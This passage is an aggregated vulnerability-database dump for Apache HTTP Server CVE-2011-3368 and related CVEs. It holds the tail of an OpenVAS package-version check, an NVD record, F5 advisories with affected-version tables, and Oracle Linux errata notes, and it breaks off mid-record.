NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "naslFamily": "Mandrake Local Security Checks"}
{"cve": [{"lastseen": "2020-10-03T11:39:31", "description": "The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.", "edition": 5, "cvss3": {}, "published": "2011-10-05T22:55:00", "title": "CVE-2011-3368", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3368"], "modified": "2018-01-09T02:29:00", "cpe": ["cpe:/a:apache:http_server:1.3.33", "cpe:/a:apache:http_server:2.0.40", "cpe:/a:apache:http_server:2.0.39", "cpe:/a:apache:http_server:1.3.27", "cpe:/a:apache:http_server:1.3.3", "cpe:/a:apache:http_server:2.2.15", "cpe:/a:apache:http_server:1.3.24", "cpe:/a:apache:http_server:2.0.34", "cpe:/a:apache:http_server:1.3.22", "cpe:/a:apache:http_server:2.2.11", "cpe:/a:apache:http_server:1.3.17", "cpe:/a:apache:http_server:2.0.56", "cpe:/a:apache:http_server:2.2.12", "cpe:/a:apache:http_server:2.2.1", "cpe:/a:apache:http_server:2.2.16", "cpe:/a:apache:http_server:2.0.32", "cpe:/a:apache:http_server:2.0.38", "cpe:/a:apache:http_server:2.0.35", "cpe:/a:apache:http_server:2.0.49", "cpe:/a:apache:http_server:1.3.10", "cpe:/a:apache:http_server:2.2.9", "cpe:/a:apache:http_server:2.0", "cpe:/a:apache:http_server:2.0.53", "cpe:/a:apache:http_server:2.0.50", 
"cpe:/a:apache:http_server:2.2.4", "cpe:/a:apache:http_server:1.3.16", "cpe:/a:apache:http_server:2.2.10", "cpe:/a:apache:http_server:2.0.58", "cpe:/a:apache:http_server:1.3.35", "cpe:/a:apache:http_server:2.2.19", "cpe:/a:apache:http_server:2.0.9", "cpe:/a:apache:http_server:1.3.6", "cpe:/a:apache:http_server:1.3.30", "cpe:/a:apache:http_server:2.0.59", "cpe:/a:apache:http_server:2.0.55", "cpe:/a:apache:http_server:2.0.28", "cpe:/a:apache:http_server:2.0.57", "cpe:/a:apache:http_server:1.3.39", "cpe:/a:apache:http_server:1.3.28", "cpe:/a:apache:http_server:2.0.48", "cpe:/a:apache:http_server:2.2.13", "cpe:/a:apache:http_server:1.3.14", "cpe:/a:apache:http_server:1.3.36", "cpe:/a:apache:http_server:2.0.46", "cpe:/a:apache:http_server:2.2.6", "cpe:/a:apache:http_server:1.3.1", "cpe:/a:apache:http_server:1.3.20", "cpe:/a:apache:http_server:1.3.19", "cpe:/a:apache:http_server:2.0.45", "cpe:/a:apache:http_server:1.3.25", "cpe:/a:apache:http_server:2.0.41", "cpe:/a:apache:http_server:1.3.5", "cpe:/a:apache:http_server:1.3.37", "cpe:/a:apache:http_server:2.2.0", "cpe:/a:apache:http_server:2.2.18", "cpe:/a:apache:http_server:1.3.1.1", "cpe:/a:apache:http_server:2.0.63", "cpe:/a:apache:http_server:2.0.44", "cpe:/a:apache:http_server:1.3.4", "cpe:/a:apache:http_server:1.3.0", "cpe:/a:apache:http_server:2.2.20", "cpe:/a:apache:http_server:1.3.12", "cpe:/a:apache:http_server:1.3.34", "cpe:/a:apache:http_server:1.3.7", "cpe:/a:apache:http_server:1.3.8", "cpe:/a:apache:http_server:2.2.2", "cpe:/a:apache:http_server:1.3.26", "cpe:/a:apache:http_server:2.2.14", "cpe:/a:apache:http_server:1.3.13", "cpe:/a:apache:http_server:1.3", "cpe:/a:apache:http_server:1.3.41", "cpe:/a:apache:http_server:1.3.11", "cpe:/a:apache:http_server:1.3.38", "cpe:/a:apache:http_server:1.3.68", "cpe:/a:apache:http_server:2.0.37", "cpe:/a:apache:http_server:1.3.42", "cpe:/a:apache:http_server:2.2.21", "cpe:/a:apache:http_server:1.3.65", "cpe:/a:apache:http_server:2.0.61", 
"cpe:/a:apache:http_server:1.3.31", "cpe:/a:apache:http_server:2.0.54", "cpe:/a:apache:http_server:1.3.32", "cpe:/a:apache:http_server:2.0.43", "cpe:/a:apache:http_server:2.0.47", "cpe:/a:apache:http_server:2.0.36", "cpe:/a:apache:http_server:1.3.15", "cpe:/a:apache:http_server:2.0.42", "cpe:/a:apache:http_server:1.3.18", "cpe:/a:apache:http_server:1.3.2", "cpe:/a:apache:http_server:1.3.23", "cpe:/a:apache:http_server:2.0.60", "cpe:/a:apache:http_server:1.3.29", "cpe:/a:apache:http_server:2.0.52", "cpe:/a:apache:http_server:2.2.3", "cpe:/a:apache:http_server:2.0.51", "cpe:/a:apache:http_server:2.0.64", "cpe:/a:apache:http_server:1.3.9", "cpe:/a:apache:http_server:2.2.8"], "id": "CVE-2011-3368", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3368", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:apache:http_server:1.3.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.64:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.51:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.53:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.42:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:http_server:2.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.65:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.60:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.52:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.31:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.57:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.56:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.28:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:http_server:2.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.58:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.32:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.47:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.49:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.54:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.61:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.68:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.63:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.59:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.34:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.40:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.48:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.55:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.38:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:1.3.4:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2017-12-19T06:45:37", "bulletinFamily": "software", "cvelist": ["CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "description": "\nF5 Product Development has assigned ID 377332 (BIG-IP), ID 474664 (Enterprise Manager), and ID 431234 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth>) may list Heuristic H492118 on the **Diagnostics** >** Identified** > **Medium** screen. \n\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP AAM | None | 11.4.0 - 11.6.0 | None \nBIG-IP AFM | None | 11.3.0 - 11.6.0 | None \nBIG-IP Analytics | 11.0.0 - 11.1.0 | 11.2.0 - 11.6.0 | httpd (Configuration utility, iControl) \nBIG-IP APM | 11.0.0 - 11.1.0 \n10.1.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP ASM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP Edge Gateway | 11.0.0 - 11.1.0 \n10.1.0 - 10.2.4 | 11.2.0 - 11.3.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP GTM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 \n| 11.2.0 - 11.6.0 \n10.2.4 HF12 \n| httpd 
(Configuration utility, iControl) \nBIG-IP Link Controller | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.6.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP PEM | None | 11.3.0 - 11.6.0 | None \nBIG-IP PSM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.4.1 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP WebAccelerator | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.3.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nBIG-IP WOM | 11.0.0 - 11.1.0 \n10.0.0 - 10.2.4 | 11.2.0 - 11.3.0 \n10.2.4 HF12 | httpd (Configuration utility, iControl) \nARX | 6.2.0 - 6.4.0* | None | Management API (disabled by default) \nEnterprise Manager | 2.1.0 - 2.3.0 | 3.0.0 - 3.1.1 | httpd (Configuration utility, iControl) \nFirePass | None | 7.0.0 \n6.1.0 | None \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | None \nBIG-IQ ADC | None | 4.5.0 | None \n \n* ARX is not vulnerable to CVE-2012-0021. \n\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists. \n \nF5 is responding to this vulnerability as determined by the parameters defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>). 
\n\n\nTo mitigate this vulnerability for ARX, do not enable the API functionality.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2016-01-09T02:05:00", "published": "2014-12-04T09:32:00", "href": "https://support.f5.com/csp/article/K15889", "id": "F5:K15889", "title": "Apache HTTP server vulnerabilities CVE-2011-3368, CVE-2011-4317, CVE-2012-0021, CVE-2012-0031, and CVE-2012-0053", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-26T17:23:18", "bulletinFamily": "software", "cvelist": ["CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053", "CVE-2012-0021", "CVE-2011-3368"], "edition": 1, "description": " * [CVE-2011-3368](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368>) \n \nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.\n * [CVE-2011-4317](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4317>) \n \nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests 
to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.\n * [CVE-2012-0021](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0021>) \n \nThe log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.\n * [CVE-2012-0031](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0031>) \n \nscoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.\n * [CVE-2012-0053](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0053>) \n \nprotocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.\n", "modified": "2015-08-03T00:00:00", "published": "2014-12-03T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/800/sol15889.html", "id": "SOL15889", "title": "SOL15889 - Apache HTTP server vulnerabilities CVE-2011-3368, CVE-2011-4317, CVE-2012-0021, CVE-2012-0031, and CVE-2012-0053", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-06-08T00:16:04", "bulletinFamily": "software", "cvelist": ["CVE-2011-3639", "CVE-2011-3368"], "edition": 1, "description": "\nF5 
Product Development has assigned ID 431234 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 \n11.4.0 - 11.6.0| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 \n11.0.0 - 11.6.0| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| 6.0.0 - 6.4.0| None| Low| Management API (disabled by default) \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| 
None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 \n| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nTo mitigate this vulnerability for the ARX system, do not enable the API functionality.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n * [K10025: Managing BIG-IP product hotfixes (10.x)](<https://support.f5.com/csp/article/K10025>)\n * [K9502: BIG-IP hotfix matrix](<https://support.f5.com/csp/article/K9502>)\n * [K10322: FirePass hotfix matrix](<https://support.f5.com/csp/article/K10322>)\n * [K12766: ARX hotfix 
matrix](<https://support.f5.com/csp/article/K12766>)\n * [K3430: Installing FirePass hotfixes](<https://support.f5.com/csp/article/K3430>)\n * [K6664: Obtaining and installing OPSWAT hotfixes](<https://support.f5.com/csp/article/K6664>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n", "modified": "2016-01-09T02:32:00", "published": "2015-12-30T01:32:00", "id": "F5:K20979231", "href": "https://support.f5.com/csp/article/K20979231", "title": "Apache vulnerability CVE-2011-3639", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:35", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368"], "description": "[2.2.3-53.0.2.el5_7.3]\r\n- Fix mod_ssl always performing full renegotiation (orabug 12423387)\r\n- replace index.html with Oracle's index page oracle_index.html\r\n- update vstring and distro in specfile\r\n \n[2.2.3-53.3]\r\n- add security fix for CVE-2011-3368 (#743903)\r\n- fix regressions in byterange handling (#736593)", "edition": 4, "modified": "2011-10-20T00:00:00", "published": "2011-10-20T00:00:00", "id": "ELSA-2011-1392", "href": "http://linux.oracle.com/errata/ELSA-2011-1392.html", "title": "httpd security and bug fix update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:47", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3347", "CVE-2011-3368", "CVE-2011-3192", "CVE-2011-3348"], "description": "[2.2.15-9.0.1.el6_1.3]\n- replace 